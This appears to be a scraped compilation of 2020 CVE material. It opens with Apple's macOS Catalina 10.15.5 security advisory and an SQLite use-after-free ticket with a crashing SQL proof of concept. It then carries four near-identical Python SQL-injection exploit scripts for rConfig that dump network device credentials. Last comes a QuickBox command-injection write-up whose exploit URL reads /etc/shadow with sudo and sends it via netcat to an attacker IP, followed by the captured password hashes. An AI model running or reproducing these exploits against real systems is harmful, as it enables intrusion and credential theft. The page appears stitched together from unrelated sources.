A permissions issue existed. This issue was addressed with improved permission validation. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to gain root privileges.

Released May 26, 2020

**Accounts**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt

**Accounts**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9772: Allison Husain of UC Berkeley

**AirDrop**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2020-9826: Dor Hadad of Palo Alto Networks

**AppleMobileFileIntegrity**

Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A malicious application could interact with system processes to access private information and perform privileged actions

Description: An entitlement parsing issue was addressed with improved parsing.

CVE-2020-9842: Linus Henze (pinauten.de)

**AppleUSBNetworking**

Available for: macOS Catalina 10.15.4

Impact: Inserting a USB device that sends invalid messages may cause a kernel panic

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9804: Andy Davis of NCC Group

**Audio**

Available for: macOS Catalina 10.15.4

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative

**Audio**

Available for: macOS Catalina 10.15.4

Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative

**Bluetooth**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to determine kernel memory layout

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9831: Yu Wang of Didi Research America

**Bluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: A local user may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9779: Yu Wang of Didi Research America

Entry added September 21, 2020

**Calendar**

Available for: macOS Catalina 10.15.4

Impact: Importing a maliciously crafted calendar invitation may exfiltrate user information

Description: This issue was addressed with improved checks.

CVE-2020-3882: Andy Grant of NCC Group

**CoreBluetooth**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6

Impact: A remote attacker may be able to leak sensitive user information

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9828: Jianjun Dai of Qihoo 360 Alpha Lab

**CVMS**

Available for: macOS Catalina 10.15.4

Impact: An application may be able to gain elevated privileges

Description: This issue was addressed with improved checks.

CVE-2020-9856: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**DiskArbitration**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to break out of its sandbox

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9847: Zhuo Liang of Qihoo 360 Vulcan Team working with 360 BugCloud (bugcloud.360.cn)

**Find My**

Available for: macOS Catalina 10.15.4

Impact: A local attacker may be able to elevate their privileges

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2020-9855: Zhongcheng Li(CK01) of Topsec Alpha Team

**FontParser**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9816:  Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Catalina 10.15.4

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-3878: Samuel Groß of Google Project Zero

**ImageIO**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9789: Wenchao Li of VARAS@IIE

CVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab

**Intel Graphics Driver**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2020-9822: ABC Research s.r.o

**Intel Graphics Driver**

Available for: macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2020-9796: ABC Research s.r.o.

Entry added July 28, 2020

**IPSec**

Available for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9837: Thijs Alkemade of Computest

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to determine another application's memory layout

Description: An information disclosure issue was addressed by removing the vulnerable code.

CVE-2020-9797: an anonymous researcher

**Kernel**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed with improved input validation.

CVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to cause unexpected system termination or write kernel memory

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4

Impact: A local user may be able to read kernel memory

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9811: Tielei Wang of Pangu Lab

CVE-2020-9812: derrek (@derrekr6)

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management.

CVE-2020-9813: Xinru Chi of Pangu Lab

CVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab

**Kernel**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to determine kernel memory layout

Description: An information disclosure issue was addressed with improved state management.

CVE-2020-9809: Benjamin Randazzo (@\_\_\_\_benjamin)

**ksh**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A local user may be able to execute arbitrary shell commands

Description: An issue existed in the handling of environment variables. This issue was addressed with improved validation.

CVE-2019-14868

**libxpc**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to overwrite arbitrary files

Description: A path handling issue was addressed with improved validation.

CVE-2020-9994: Apple

Entry added September 21, 2020

**NSURL**

Available for: macOS Mojave 10.14.6

Impact: A malicious website may be able to exfiltrate autofilled data in Safari

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2020-9857: Dlive of Tencent Security Xuanwu Lab

**PackageKit**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to gain root privileges

Description: A permissions issue existed. This issue was addressed with improved permission validation.

CVE-2020-9817: Andy Grant of NCC Group

**PackageKit**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to modify protected parts of the file system

Description: An access issue was addressed with improved access restrictions.

CVE-2020-9851: an anonymous researcher, Linus Henze (pinauten.de)

Entry updated July 15, 2020

**Python**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2020-9793

**rsync**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to overwrite existing files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2014-9512: gaojianfeng

Entry added July 28, 2020

**Sandbox**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may be able to bypass Privacy preferences

Description: An access issue was addressed with additional sandbox restrictions.

CVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)

**Sandbox**

Available for: macOS Mojave 10.14.6

Impact: A user may gain access to protected parts of the file system

Description: This issue was addressed with a new entitlement.

CVE-2020-9771: Csaba Fitzl (@theevilbit) of Offensive Security

**Security**

Available for: macOS Catalina 10.15.4

Impact: A file may be incorrectly rendered to execute JavaScript

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9788: Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated July 15, 2020

**Security**

Available for: macOS Catalina 10.15.4

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved validation.

CVE-2020-9854: Ilias Morad (A2nkF)

Entry added July 28, 2020

**SIP**

Available for: macOS Catalina 10.15.4

Impact: A non-privileged user may be able to modify restricted network settings

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9824: @jamestraynor, Csaba Fitzl (@theevilbit) of Offensive Security

Entry updated June 10, 2020

**Software Update**

Available for: macOS Catalina 10.15.4

Impact: A person with physical access to a Mac may be able to bypass Login Window

Description: A logic issue was addressed with improved restrictions.

CVE-2020-9810: Francis @francisschmaltz

Entry added July 15, 2020

**SQLite**

Available for: macOS Catalina 10.15.4

Impact: A malicious application may cause a denial of service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2020-9794

**System Preferences**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to gain elevated privileges

Description: A race condition was addressed with improved state handling.

CVE-2020-9839: @jinmo123, @setuid0x0\_, and @insu\_yun\_en of @SSLab\_Gatech working with Trend Micro’s Zero Day Initiative

**USB Audio**

Available for: macOS Catalina 10.15.4

Impact: A USB device may be able to cause a denial of service

Description: A validation issue was addressed with improved input sanitization.

CVE-2020-9792: Andy Davis of NCC Group

**Wi-Fi**

Available for: macOS Catalina 10.15.4

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: A double free issue was addressed with improved memory management.

CVE-2020-9844: Ian Beer of Google Project Zero

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2020-9830: Tielei Wang of Pangu Lab

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2020-9834: Yu Wang of Didi Research America

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A local user may be able to read kernel memory

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2020-9833: Yu Wang of Didi Research America

**Wi-Fi**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A malicious application may be able to determine kernel memory layout

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-9832: Yu Wang of Didi Research America

**WindowServer**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An integer overflow was addressed with improved input validation.

CVE-2020-9841: ABC Research s.r.o. working with Trend Micro Zero Day Initiative

**zsh**

Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4

Impact: A local attacker may be able to elevate their privileges

Description: An authorization issue was addressed with improved state management.

CVE-2019-20044: Sam Foxman

CVE-2020-9817: About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra

A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.

CVE-2020-9830: About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra

SQLite 3.32.2 has a use-after-free in resetAccumulator in select.c because the parse tree rewrite for window functions is too late.

Overview

Artifact ID:

cd708fa84d2aaaeacf8fdbef6d594742d061bedc0a2553e4930849abb4adf692

Ticket:

c8d3b9f0a750a529ec2f991aa9c8f0d68699f263  
Use after free in resetAccumulator.

User & Date:

yongheng on 2020-06-05 01:52:37

Changes

1.  icomment:
    
    > Release version is affected.
    > 
    > POC:
    > ---
    > CREATE TABLE a(b);
    > SELECT(SELECT b FROM a GROUP BY b HAVING(NULL AND b IN((SELECT COUNT() OVER(ORDER BY b) = lead(b) OVER(ORDER BY 3.100000 \* SUM(DISTINCT CASE WHEN b LIKE 'SM PACK' THEN b \* b ELSE 0 END) / b))))) FROM a EXCEPT SELECT b FROM a ORDER BY b, b, b;
    > ---
    
2.  login: "yongheng"
3.  mimetype: "text/plain"
4.  severity changed to: "Important"
5.  status changed to: "Open"
6.  title changed to: "Use after free in resetAccumulator."
7.  type changed to: "Code\_Defect"

CVE-2020-13871: SQLite: Ticket Change Details

PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.

CVE-2020-13692

rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

#!/usr/bin/python3

\# CVE-2020-10546

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.7

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+%s"""

ulen \= 3

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL"\*(ulen \- 1)+"+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL"\*(ulen \- 1)+"+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10546: exploits/CVE-2020-10546.py at master · theguly/exploits

rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

Cannot retrieve contributors at this time

#!/usr/bin/python3

\# CVE-2020-10548

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.6

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/devices.inc.php?search=True&searchField=antani'+%s&searchColumn=n.id&searchOption=contains"""

ulen \= 10

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" \* (ulen \- 1) +"+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" \* (ulen \- 1)+"+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10548: exploits/CVE-2020-10548.py at master · theguly/exploits

rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

Cannot retrieve contributors at this time

#!/usr/bin/python3

\# CVE-2020-10547

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.6

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/compliancepolicyelements.inc.php?search=True&searchField=antani'+%s&searchColumn=elementName&searchOption=contains"""

ulen \= 5

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" \* (ulen \- 1) + "+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" \* (ulen \- 1) + "+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10547: exploits/CVE-2020-10547.py at master · theguly/exploits

rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

Permalink

Cannot retrieve contributors at this time

#!/usr/bin/python3

\# CVE-2020-10549

\# author https://github.com/theguly/

#

\# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)

\# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user

#

\# i wanted to have different py script foreach CVE, to have a proper listing on github.

\# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.

#

\# tested with rConfig < 3.9.6

import sys

import requests

import urllib3

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

burl \= """/snippets.inc.php?search=True&searchField=antani'+%s&searchColumn=snippetName&searchOption=contains"""

ulen \= 4

if len(sys.argv) < 2:

print('use: ./{} target'.format(sys.argv\[0\]))

print('./{} https://1.2.3.4/'.format(sys.argv\[0\]))

sys.exit()

url \= sys.argv\[1\] + burl

s \= requests.Session()

s.verify \= False

def getInfo(purl):

r \= s.get(purl)

if '\[PWN\]' in str(r.text):

ret \= str(r.text).split('\[PWN\]')\[1\]

return ret

else:

return False

def askContinue(msg):

c \= input('\[-\] '+msg+' (Y/n)')

if 'n' in c.lower():

sys.exit()

\# find current db name

print("\[+\] extracting rconfig db: ",end\='')

payload \= "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" \* (ulen \- 1) +"+--+"

purl \= url % payload

dbname \= getInfo(purl)

print(dbname)

\# dump all devices ip,username,password,enablepass

print("\[+\] dumping nodes: ")

print('devicename:ip:username:password:enablepass')

print('------------------------------------------')

i\=0

while True:

if i \> 0 and not i % 10:

askContinue('Continue?')

payload \="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" \* (ulen \- 1)+"+--+"

purl \= url % payload

n \= getInfo(purl)

if not n:

askContinue('it could be possible that we don\\'t have more devices. continue?')

print(n)

i \= i + 1

sys.exit()

CVE-2020-10549: exploits/CVE-2020-10549.py at master · theguly/exploits

Apache Ignite uses H2 database to build SQL distributed execution engine. H2 provides SQL functions which could be used by attacker to access to a filesystem.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2020-1963

QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8 allows an authenticated remote attacker to execute code on the server via command injection in the servicestart parameter.

**Impact**

QuickBox CE <= v2.5.5 and QuickBox Pro <= 2.1.8 are both affected by an authenticated remote code execution (RCE) (_CVE-2020-13448_) and privilege escalation vulnerabilities (_CVE-2020-13694_ and _CVE-2020-13695_).  
A low-privileged user can execute arbitary commands on the server with the privileges of the user running the web server, and in turn escalate privileges to root by abusing weak sudo rules.

**What is QuickBox?**

QuickBox is a complete media server application and services management system, with a simplistic approach to achieving easy application installation and management from a beautifully designed dashboard, allowing users the ability to interact with their media server on a professional grade level.

**Versions affected**

*   QuickBox CE v2.5.5 and prior
*   QuickBox Pro v2.1.8 and prior

**Vulnerability**

Since this CVE covers two separate "versions" of QuickBox, with almost identical vulnerabilities, I have split the post into two parts; one for QuickBox CE and one for QuickBox Pro.

The vulnerability is located in the file `/inc/config.php`. This file is mainly used to setup configuration parameters to be used later by the application. At the end of this file we see that it also accept a GET parameter which will be used, unsanitized, in a call to `shell_exec`, leading to a command injection vulnerability.

Below is a snippet of the vulnerable code from`config.php`:

    switch (intval($_GET['id'])) {
    /* restart services */
    case 88:
      $process = $_GET['servicestart'];
        if ($process == "resilio-sync"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "shellinabox"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "emby-server"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "headphones"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "lidarr"){
          shell_exec("sudo systemctl stop $process");
          shell_exec("sudo systemctl disable $process");
        } elseif ($process == "nzbget"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "plexmediaserver"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "Tautulli"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "ombi"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "radarr"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "subsonic"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "transmission-daemon"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "qbittorrent"){
          shell_exec("sudo systemctl enable $process@$username");
          shell_exec("sudo systemctl restart $process@$username");
        } else {
          shell_exec("sudo systemctl restart $process@$username");
        }

Since we can control both `$_GET['id']` and `$_GET['servicestart']` we can inject our own commands into the last call to`shell_exec` and achieve remote code execution.

The complete vulnerable file can be found here: https://github.com/QuickBox/QB/blob/6f4253d82ccfdc85641fa6b27712569890687482/dashboard/inc/config.php

**Exploit**

Exploiting this vulnerability is pretty straight forward.

By sending a GET request to the following URL: `https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Dump /etc/shadow**

Upon further analysis we found that the www-data user can run quite a few commands and programs as root using sudo - _without a password_.  
One of the commands that can be executed is `grep`.  
But since the output of the command executed by `shell_exec`isn't displayed on the website, we won't see any output when trying to exfiltrate sensitive information.

One way to get a around this limitation is to use grep to write the contents of `/etc/shadow` to a file we can read from and use netcat to send the file back to our listener.

If we setup a netcat listener and visit the following URL we can trigger the exploit and receive the output of `/etc/shadow`:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+.+/etc/shadow+>pwds;nc+<OUR-IP-ADDRESS>+9001+<+pwds;rm+pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 58814
    root:$6$lYAppqO4$ParMSRU7IDtSULWHfA4sy8iQCm9/nJP.RksoLau0zBHp0VPbOfYBipZlcQ8VVvnvArRC37r3y/hBLgYRDZ5:18406:0:99999:7:::
    daemon:*:17920:0:99999:7:::
    bin:*:17920:0:99999:7:::
    sys:*:17920:0:99999:7:::
    sync:*:17920:0:99999:7:::
    games:*:17920:0:99999:7:::
    man:*:17920:0:99999:7:::
    lp:*:17920:0:99999:7:::
    mail:*:17920:0:99999:7:::
    news:*:17920:0:99999:7:::
    uucp:*:17920:0:99999:7:::
    proxy:*:17920:0:99999:7:::
    www-data:*:17920:0:99999:7:::
    backup:*:17920:0:99999:7:::
    list:*:17920:0:99999:7:::
    irc:*:17920:0:99999:7:::
    gnats:*:17920:0:99999:7:::
    nobody:*:17920:0:99999:7:::
    systemd-timesync:*:17920:0:99999:7:::
    systemd-network:*:17920:0:99999:7:::
    systemd-resolve:*:17920:0:99999:7:::
    systemd-bus-proxy:*:17920:0:99999:7:::
    syslog:*:17920:0:99999:7:::
    _apt:*:17920:0:99999:7:::
    postfix:*:17920:0:99999:7:::
    sshd:*:17920:0:99999:7:::
    uuidd:*:17920:0:99999:7:::
    messagebus:*:17920:0:99999:7:::
    s1gh:$6$hf2vF79G$APAqRRKp4Jax27xzZE1npHlumLWaDsgaHo3z/Sw6Z3tEnemam9h.EB1pXFx1Jy9mZ/jqaQoTBlL7TphlAZb210:18406:0:99999:7:::
    memcache:!:18406:0:99999:7:::
    vnstat:*:18406:0:99999:7:::
    debian-deluged:*:18406:0:99999:7:::
    ftp:*:18406:0:99999:7:::
    shellinabox:*:18406:0:99999:7:::
